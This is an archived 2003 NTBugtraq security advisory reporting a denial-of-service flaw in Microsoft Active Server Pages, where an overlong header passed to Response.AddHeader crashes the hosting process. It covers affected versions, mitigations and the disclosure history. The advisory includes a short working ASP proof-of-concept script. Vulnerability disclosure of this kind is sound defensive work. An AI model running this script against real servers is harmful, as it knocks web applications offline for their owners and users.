Microsoft Active Server Pages DoS

From: Parcifal Aertssen (parcifal@AQTRONIX.COM)
Date: 04/19/03

  • Next message: Russ: "Revised: Microsoft Security Bulletin - MS03-007" 
    Date:         Sat, 19 Apr 2003 00:18:37 +0200
From: Parcifal Aertssen <parcifal@AQTRONIX.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    AQTRONIX Security Advisory AQ-2003-01
    =====================================

    Topic: Microsoft Active Server Pages DoS

    Release date: 18 April 2003

    Systems Tested: Windows 2000 Server Family + SP3 + MS02-062

    Affected Systems: IIS 4.0, IIS 5.0, IIS 5.1 with ASP 3.0 installed (I did
    not test previous versions of ASP).
    I also tested ASP.NET but it doesn't seem vulnerable. So all systems with
    the "asp.dll" present are vulnerable.

    Mitigating factors: in order to execute the exploit a user would need to be
    able to upload or change an asp file to the affected server and execute it.

    Category: Denial of Service

    Vendor URL: http://www.microsoft.com

    Author: Parcifal Aertssen

    This document (and updates) is available at:
    http://www.aqtronix.com/Advisories/AQ-2003-01.txt

    Introduction
    ============

    Microsofts Active Server Pages contains a flaw in which you could crash the
    ASP Application and use it as a denial of service. A malicious user would
    need to be able to upload or change an ASP file and execute it to exploit
    this bug.

    Details
    =======

    Microsofts Active Server Pages is a web technology that lets you easily
    create dynamic web pages and complete web based applications. It is coded in
    a scripting language like VBScript. To work with the web based parts, ASP
    adds objects of which you can call functions and set properties. One of
    those functions in the Response Object contains a flaw that can be used to
    overflow the stack. The function in particular is Response.AddHeader(). This
    functions requires a header name and header value as its parameters. If one
    of those values is a very long string (more than 350000 characters) the ASP
    application will crash as a result of excessive stack usage. The dllhost.exe
    process hosting the ASP application will crash, as a result the web site
    using that application and other ASP applications in the same pool will also
    crash. The next request for the web site will cause the ASP application to
    restart (but you lose all application/session state and variables) or if you
    have application caching enabled the next request will result in the error
    message "The remote procedure call failed and did not execute." or "The RPC
    server is unavailable." More request will eventually restart the
    application.

    Warning: if you run ASP "in-process" then inetinfo.exe will fail, this means
    that your complete web server will crash (and restart if you have IIS 5).

    Exploit
    =======

    <%
    Dim i, r
    For i=1 to 3500
     'each time append 100 characters
     'line below may wrap
     r = r +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaa"
    Next

    Response.AddHeader "random-header:", r 'this is where it crashes
    %>

    Solution
    ========

    None. You can however limit the DoS by running each ASP application as
    "Isolated".
    Microsoft told me that this patch was going to be included in the next
    cumulative patch, which they would release in February. They didn't, they
    said that they still had a lot of testing to do together with the other
    issues in the cumulative patch. Since February I haven't heard from them.

    History
    =======

    2002.11.04 Found the vulnerability.
    2002.11.07 Mailed it to Microsoft.
    2003.01.14 Received private patch which worked.
    2003.02.10 Received a mail that they still had a lot of testing to do.
    2003.04.18 Released initial advisory

    Disclaimer
    ==========

    The information in this advisory and any of its demonstrations is provided
    "as is" without warranty of any kind.

    AQTRONIX is not liable for any direct or indirect damages caused as a result
    of using the information or demonstrations provided in any part of this
    advisory.

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Have you discovered a security vulnerability related to Windows or a
    commercial product which runs on Windows?

    Need assistance crafting the format or translating your advisory to English?

    Need to verify it, or having problems contacting the Vendor?

    Contact mailto:Advisories@NTBugtraq.com

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

  • Next message: Russ: "Revised: Microsoft Security Bulletin - MS03-007"

    Relevant Pages

    • Re: ASP Probleme und IISState
      ... Das war ein falsche angabe der debugger pack war bei der ... >Also ich habe keinen richtigen Crash sondern nur der ASP ... >>Jetzt war es mal wieder soweit der ASP Service ist ...
      (microsoft.public.de.inetserver.iis)
    • Re: ASP Probleme und IISState
      ... Also ich habe keinen richtigen Crash sondern nur der ASP ... Service hängt sich auf. ... Next by Date: ...
      (microsoft.public.de.inetserver.iis)
    • Re: Active Server Pages stop working
      ... But when they crash, in Internet Information Services ... >I host about 20 websites with a lot of asp pages on a Windows 2003 server. ...
      (microsoft.public.windows.server.general)
    • Re: HELP!!! ASP pages stop or timed out
      ... I had install the IISstate. ... Or Soft Crash (ASP 0115)? ...
      (microsoft.public.inetserver.iis)